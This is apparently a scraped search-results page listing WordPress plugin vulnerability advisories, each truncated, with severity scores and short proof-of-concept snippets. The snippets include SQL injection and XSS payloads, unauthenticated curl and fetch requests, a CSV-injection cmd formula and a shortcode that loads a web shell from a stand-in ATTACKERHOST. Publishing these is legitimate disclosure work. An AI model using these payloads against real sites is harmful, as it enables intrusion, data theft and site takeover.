Lucene search
K
WpexploitMost viewed

4359 matches found

wpexploit
wpexploit
added 2022/05/24 12:0 a.m.207 views

Rating by BestWebSoft < 1.6 - Rating Denial of Service

The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service on the post/page when a user submit such rating Under Settings - Discussion, uncheck "Comment must be manually approved" Install and Enable Rating BestWebSoft plugin Change "Enable...

6.5CVSS6.5AI score0.01176EPSS
Exploits2
wpexploit
wpexploit
added 2021/01/08 12:0 a.m.207 views

Modal Survey < 2.0.1.8.2 - Unauthenticated Arbitrary Survey Update, Deletion and Creation

The plugin AJAX calls including unauthenticated ones did not have capabilities and CSRF checks, allowing unauthenticated users to update, delete or create arbitrary surveys. curl --url https://exmple.com/wp-admin/admin-ajax.php --data "action=ajaxsurvey&sspcmd=delete&surveyid=110251535" curl --ur...

3.1AI score
Exploits0References1
wpexploit
wpexploit
added 2023/08/21 12:0 a.m.206 views

MasterStudy LMS < 3.0.18 - Unauthenticated Instructor Account Creation

Description The plugin does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and/or posts. 1. Visit the Profiles Settings page for the plugin: MS LMS LMS Settings Profiles 2. Ensure that "Disable Instructor...

7.5CVSS7.5AI score0.03495EPSS
Exploits6
wpexploit
wpexploit
added 2023/07/24 12:0 a.m.206 views

Ultimate Addons for Contact Form 7 < 3.1.29 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Ensure Contact Form 7 is installed,...

4.8CVSS4.8AI score0.00402EPSS
Exploits2
wpexploit
wpexploit
added 2022/05/16 12:0 a.m.206 views

FiboSearch < 1.18.0 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfilteredhtml capability is disallowed Put the following payload in the Woocommerce FiboSearch Autocomplete Products - "No...

4.8CVSS0.5AI score0.00565EPSS
Exploits2
wpexploit
wpexploit
added 2022/03/16 12:0 a.m.206 views

Download Manager < 3.2.39 - Unauthenticated brute force of files master key

The plugin uses the uniqid php function to generate the master key for a download, allowing an attacker to brute force the key with reasonable resources giving direct download access regardless of role based restrictions or password protections set for the download. ?php // The full timestamp fro...

7.5CVSS0.2AI score0.0151EPSS
Exploits2
wpexploit
wpexploit
added 2021/02/16 12:0 a.m.206 views

Ninja Forms < 3.4.34 - Administrator Open Redirect

The wpajaxnfoauthconnect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place. http://mysite.com/wp-admin/admin-ajax.php?clientid=1&redirect=https://google.com&action=nfoauthconnect...

2AI score0.01643EPSS
Exploits2References1
wpexploit
wpexploit
added 2023/10/20 12:0 a.m.205 views

Slimstat Analytics < 5.0.10 - Contributor+ SQL Injection

Description The plugin is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 5.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers wit...

8.8CVSS6.5AI score0.00916EPSS
Exploits4
wpexploit
wpexploit
added 2023/06/12 12:0 a.m.205 views

ND Shortcodes < 7.0 - Contributor+ Stored XSS via Shortcodes

The plugin does not validate and escape numerous of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks ndoptionsteam...

5.4CVSS8AI score0.00444EPSS
Exploits2
wpexploit
wpexploit
added 2022/06/27 12:0 a.m.205 views

Woo Discount Rules < 2.4.2 - Reflected Cross-Site Scripting

The plugin does not escape a parameter before outputting it back in an attribute of the plugin's discount rule page, leading to Reflected Cross-Site Scripting https://example.com/wp-admin/admin.php?page=woodiscountrules&name="+style=animation-name:rotation+onanimationstart=alert/XSS///...

6.1CVSS1.1AI score0.00661EPSS
Exploits2
wpexploit
wpexploit
added 2021/10/06 12:0 a.m.205 views

Formidable Form Builder < 5.0.07 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape its Form's Labels, allowing high privileged users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Create/edit a form, add the following payload to a Field Label: alert/XSS/ The XSS will be triggered when...

4.8CVSS0.3AI score0.00654EPSS
Exploits2References1
wpexploit
wpexploit
added 2024/05/14 12:0 a.m.204 views

The Events Calendar < 6.4.0.1 - Reflected XSS

Description The plugin does not properly sanitize user-submitted content when rendering some views via AJAX. The Events Calendar "...

6.8AI score0.01834EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/24 12:0 a.m.204 views

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

8.8CVSS7.4AI score0.00985EPSS
Exploits2
wpexploit
wpexploit
added 2023/04/04 12:0 a.m.204 views

Zyrex Popup < 1.1 - Admin+ Arbitrary File Upload

The plugin does not validate the type of files uploaded when creating a popup, allowing a high privileged user such as an Administrator to upload arbitrary files, even when modifying the file system is disallowed, such as in a multisite install. Create a new popup by filling in anything in the...

7.2CVSS9.2AI score0.00962EPSS
Exploits2
wpexploit
wpexploit
added 2023/01/13 12:0 a.m.204 views

MonsterInsights < 8.12.1 - Contributor+ Stored XSS

The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. As a contributor, add an "Inline Popular Posts" to a...

5.4CVSS0.8AI score0.00589EPSS
Exploits2
wpexploit
wpexploit
added 2022/05/02 12:0 a.m.204 views

Nirweb support < 2.8.2 - Unauthenticated SQLi

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an SQL injection curl https://example.com/wp-admin/admin-ajax.php --data 'action=answerdticket&idform=1 UNION ALL SELECT NULL,NULL,SELECT userpa...

9.8CVSS1.6AI score0.12408EPSS
Exploits2
wpexploit
wpexploit
added 2023/08/10 12:0 a.m.203 views

Store Locator WordPress < 1.4.13 - Reflected XSS

Description The plugin does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin Make a logged in admin open the URL below...

6.1CVSS6AI score0.00645EPSS
Exploits1
wpexploit
wpexploit
added 2023/02/09 12:0 a.m.203 views

WPCode < 2.0.7 - Contributor+ WPCode Library Auth Key Update/Deletion

The plugin does not have adequate privilege checks in place for several AJAX actions, only checking the nonce. This may lead to allowing any authenticated user who can edit posts to call the endpoints related to WPCode Library authentication such as update and delete the auth key. As a contributo...

4.3CVSS5.8AI score0.00801EPSS
Exploits2
wpexploit
wpexploit
added 2022/11/28 12:0 a.m.203 views

Photo Gallery < 1.8.3 - Stored XSS via CSRF

The plugin does not validate and escape some parameters before outputting them back in in JS code later on in another page, which could lead to Stored XSS issue when an attacker makes a logged in admin open a malicious URL or page under their control. Note: The XSS will only trigger for the...

5.4CVSS5.3AI score0.00244EPSS
Exploits2
wpexploit
wpexploit
added 2023/09/11 12:0 a.m.202 views

Read More & Accordion < 3.2.7 - Admin+ PHP Object Injection

Description The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present. To simulate a gadget chain, put the following code in a plugin: class Evil public function wakeup : voi...

7.2CVSS7.6AI score0.00783EPSS
Exploits2
wpexploit
wpexploit
added 2022/08/10 12:0 a.m.202 views

Directorist < 7.3.1 - Unauthenticated Email Address Disclosure

The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and any authenticated users https://example.com/wp-admin/admin-ajax.php?action=directoristauthorpagination...

5.3CVSS2.1AI score0.01355EPSS
Exploits2
wpexploit
wpexploit
added 2022/07/05 12:0 a.m.202 views

Login with phone number < 1.3.8 - Multiple Admin+ Stored XSS

The plugin does not sanitise and escape plugin settings which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. Plugin settings Style Settings button border radius or other field put to input field: alert'XSS'; Text &...

4.8CVSS4.8AI score0.00559EPSS
Exploits2
wpexploit
wpexploit
added 2024/06/06 12:0 a.m.201 views

H5P < 1.15.8 - Contributor+ Stored XSS

Description The plugin does not validate uploads which could allow a Contributors and above to update malicious SVG files, leading to Stored Cross-Site Scripting issues 1. Upload an H5P archive containing a malicious SVG file w/an XSS 2. Example:...

6AI score0.00315EPSS
Exploits2
wpexploit
wpexploit
added 2024/02/01 12:0 a.m.201 views

Website Builder by SeedProd < 6.15.22 - Unauthenticated Plugin Page Content Update

Description The plugin does not have authorisation in its seedprodlitenewlpage function, allowing unauthenticated attackers to update the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin to a blank state As unauthenticated, open the following URL to put the...

5CVSS7.7AI score0.0068EPSS
Exploits1References1
wpexploit
wpexploit
added 2023/06/05 12:0 a.m.201 views

KiviCare Management System < 3.2.1 - Subscriber+ Unauthorised AJAX Calls

The plugin does not have proper CSRF and authorisation checks in various AJAX actions, allowing any authenticated users, such as subscriber to call them. Attacks include but are not limited to: Add arbitrary Clinic Admin/Doctors/etc and update plugin's settings Run one of the below commands in th...

4.3CVSS9.3AI score0.00247EPSS
Exploits2
wpexploit
wpexploit
added 2022/08/01 12:0 a.m.201 views

WP Sticky Button < 1.4.1 - Unauthenticated Arbitrary Settings Update to Stored XSS

The plugin does not have authorisation and CSRF checks when saving its settings, allowing unauthenticated users to update them. Furthermore, due to the lack of escaping in some of them, it could lead to Stored Cross-Site Scripting issues fetch"/wp-admin/admin-ajax.php", "headers": "content-type":...

5.4CVSS1.2AI score0.00302EPSS
Exploits2
wpexploit
wpexploit
added 2022/07/28 12:0 a.m.201 views

VR Calendar <= 2.3.4 - Admin+ LFI

The plugin does not validate user input before using it in a require statement, which could allow high privilege users to perform LFI attacks. The attack could also be performed via a CSRF vector by making a logged in admin open a malicious link...

3.6AI score
Exploits0
wpexploit
wpexploit
added 2022/03/14 12:0 a.m.201 views

Library File Manager < 5.2.3 - Subscriber+ Arbitrary File Creation/Upload/Deletion

The plugin is using an outdated version of the elFinder library, which is know to be affected by security issues CVE-2021-32682, and does not have any authorisation as well as CSRF checks in its connector AJAX action, allowing any authenticated users, such as subscriber to call it. Furthermore, a...

9.8CVSS9AI score0.69934EPSS
Exploits6
wpexploit
wpexploit
added 2021/02/06 12:0 a.m.201 views

Wyzi < 2.4.3 - Reflected Cross-Site Scripting (XSS)

The Wyzi Theme was affected by reflected XSS vulnerabilities in the business search feature https://example.com/business/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert/XSS/%3Easd&wyz-loc-filter-txt=&loc-filter-txt=&loc-filter-lat=&loc-filter-lng=&category=&radius=0...

1.2AI score
Exploits0
wpexploit
wpexploit
added 2022/10/10 12:0 a.m.200 views

Smart Slider 3 < 3.5.1.11 - PHP Object Injection

The plugin unserialises the content of an imported file, which could lead to PHP object injection issues when a user import intentionally or not a malicious file, and a suitable gadget chain is present on the site. To simulate a gadget chain, put the following code in a plugin class Evil public...

8.8CVSS0.4AI score0.01903EPSS
Exploits3
wpexploit
wpexploit
added 2022/04/18 12:0 a.m.200 views

MapSVG < 6.2.20 - Unauthenticated SQLi

The plugin does not validate and escape a parameter via a REST endpoint before using it in a SQL statement, leading to a SQL Injection exploitable by unauthenticated users. https://example.com/wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20SELECT%2042%20FROM%20SELECTSLEEP5b--+...

9.8CVSS2.3AI score0.10279EPSS
Exploits2
wpexploit
wpexploit
added 2022/03/14 12:0 a.m.200 views

KingComposer <= 2.9.6 - Subscriber+ Stored Cross-Site Scripting

The plugin does not have authorisation, CSRF and sanitisation/escaping when creating profile, allowing any authenticated users to create arbitrary ones, with Cross-Site Scripting payloads in them Create profile: fetch"https://example.com/wp-admin/admin-ajax.php?action=kccreateprofile", "headers":...

5.4CVSS0.2AI score0.00627EPSS
Exploits2
wpexploit
wpexploit
added 2021/07/24 12:0 a.m.200 views

Broken Link Manager <= 0.6.5 - Authenticated (admin+) SQL Injection

The plugin does not sanitise, validate or escape the url GET parameter before using it in a SQL statement when retrieving an URL to edit, leading to an authenticated SQL injection issue GET...

6.5CVSS1.6AI score0.01578EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/10/06 12:0 a.m.199 views

Access Demo Importer < 1.0.7 - Subscriber+ Arbitrary File Upload

Versions up to, and including, 1.0.6, of the Access Demo Importer WordPress plugin are vulnerable to arbitrary file uploads via the pluginofflineinstaller AJAX action due to a missing capability check in the pluginofflineinstallercallback functionfound in the /inc/demo-functions.php file along wi...

8.8CVSS1.5AI score0.01652EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/09/23 12:0 a.m.199 views

3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload

Description The plugin does not have any authorisation and does not check the uploaded file in its p3dlitehandleupload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as...

9.8CVSS7.5AI score0.067EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/06/21 12:0 a.m.199 views

Sign-up Sheets < 1.0.14 - Authenticated CSV Injection

The plugin does not not sanitise or validate the Sheet title when generating the CSV to export, which could lead to a CSV injection issue Go to the Sign-up Sheets-- Add New. Enter the following CSV Injection payload in the field "Title", "Details" and "Task" click on save button. =cmd|' /C...

8CVSS0.01308EPSS
Exploits2
wpexploit
wpexploit
added 2021/06/10 12:0 a.m.199 views

Real Estate 7 < 3.1.1 - Reflected Cross-Site Scripting (XSS)

The theme did not properly sanitise the ctcommunity parameter in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which can be triggered in both unauthenticated or authenticated user context...

6.1CVSS0.4AI score0.03677EPSS
Exploits2References1
wpexploit
wpexploit
added 2024/05/23 12:0 a.m.198 views

Themify Builder < 7.5.8 - Open Redirect

Description The plugin does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue curl -kvL https://www.example.com/wp-login.php \ -e http://arbitrary-referer \ -d...

6.7AI score0.00823EPSS
Exploits2
wpexploit
wpexploit
added 2024/05/14 12:0 a.m.198 views

Insert or Embed Articulate Content into WordPress <= 4.3000000023 - Author+ Upload to RCE

Description The plugin is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files Note: This must be tested on a web server running Apache 1 Create a new post 2 Add e-Learning block to the post and upload a z...

6.8AI score0.00936EPSS
Exploits3References1
wpexploit
wpexploit
added 2024/03/11 12:0 a.m.198 views

WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF

Description The plugin does not have CSRF check in its bulk action, which could allow attackers to make logged in users delete arbitrary filters via CSRF attack, granted they know the related filter slugs Make a logged in admin open the URL below to make them delete the filter with the slug test1...

6.9AI score0.00237EPSS
Exploits2
wpexploit
wpexploit
added 2023/07/24 12:0 a.m.198 views

Contact Form Builder by Bit Form < 2.2.0 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Create a Blank form or select conta...

4.8CVSS4.9AI score0.00379EPSS
Exploits2
wpexploit
wpexploit
added 2021/02/17 12:0 a.m.198 views

Process Steps Template Designer < 1.3 - CSRF to Stored Cross-Site Scripting (XSS)

The plugin did not properly check its CSRF nonce in the FontAwesomeField.save method, which could allow attackers to make logged in users capable of editing posts change the Step Icon of arbitrary Process Steps. Due to the lack of sanitisation of the submitted Step icon value, it could also lead ...

1.1AI score
Exploits0References2
wpexploit
wpexploit
added 2024/04/16 12:0 a.m.197 views

EasyEvent <= 1.0.0 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfilteredhtml is disallowed 1. Got to https://example.com/wp-admin/options-general.php?page=easyevent 2. In the ID fiel...

6AI score0.00435EPSS
Exploits2
wpexploit
wpexploit
added 2023/10/27 12:0 a.m.197 views

Seraphinite Accelerator < 2.2.29 - Authenticated Arbitrary Redirect

Description The plugin does not validate the URL to redirect any authenticated user to, leading to an arbitrary redirect Make a logged in user open https://example.com/wp-admin/admin-ajax.php?action=seraphaccelact&fn=acceptEula&redir=https%3A%2F%2Fwpscan.com...

5.4CVSS6AI score0.0037EPSS
Exploits2
wpexploit
wpexploit
added 2022/02/07 12:0 a.m.197 views

AdRotate < 5.8.22 - Admin+ SQL Injection

The plugin does not sanitise and escape the adrotateaction before using it in a SQL statement via the adrotaterequestaction function available to admins, leading to a SQL injection Get the nonce from one of the bulk action, for example /wp-admin/admin.php?page=adrotate and look for adrotatenonce ...

7.2CVSS1.1AI score0.01255EPSS
Exploits2
wpexploit
wpexploit
added 2024/05/14 12:0 a.m.196 views

BuddyBoss Platform < 2.6.0 - Insecure Direct Object Reference on Like Comment

Description The plugin contains an IDOR vulnerability that allows a user to like a private post by manipulating the ID included in the request POST /wp-admin/admin-ajax.php HTTP/2 Host: buddyboss.example.com Cookie: REDACTED User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.15; rv:120.0...

6.5AI score0.0043EPSS
Exploits2
wpexploit
wpexploit
added 2023/12/21 12:0 a.m.196 views

Easy Forms for Mailchimp < 6.9.0 - Admin+ Stored Cross-Site Scripting

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfilteredhtml is disallowed 1 Create a new opt-in form 2 Edit the form, and add a "First name" field. 3 Update the form...

4.8CVSS4.8AI score0.00402EPSS
Exploits2
wpexploit
wpexploit
added 2022/12/20 12:0 a.m.196 views

WOOCS < 1.3.9.4 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins...

5.4CVSS1.5AI score0.00503EPSS
Exploits3
wpexploit
wpexploit
added 2022/11/22 12:0 a.m.196 views

Easy Video Player < 1.2.2.3 - Contributor+ Stored XSS

The plugin does not sanitize and escapes some parameters, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks. 1. Add a new post and add the payload there: evpembedvideo url='" onerror=alert/XSS/ "' 2. Preview the post, and the XSS will trigger...

5.4CVSS2AI score0.00507EPSS
Exploits2
wpexploit
wpexploit
added 2021/02/06 12:0 a.m.196 views

Paid Membership Pro < 2.5.3 - Unauthorised Order Information Disclosure

The pmprogetorderjson AJAX action, available to authenticated user did not check for authorisation, allowing any authenticated users to retrieve arbitrary order information such as customer names, email addresses, and order numbers via the orderid parameter...

3.3AI score
Exploits0References1
Total number of security vulnerabilities4359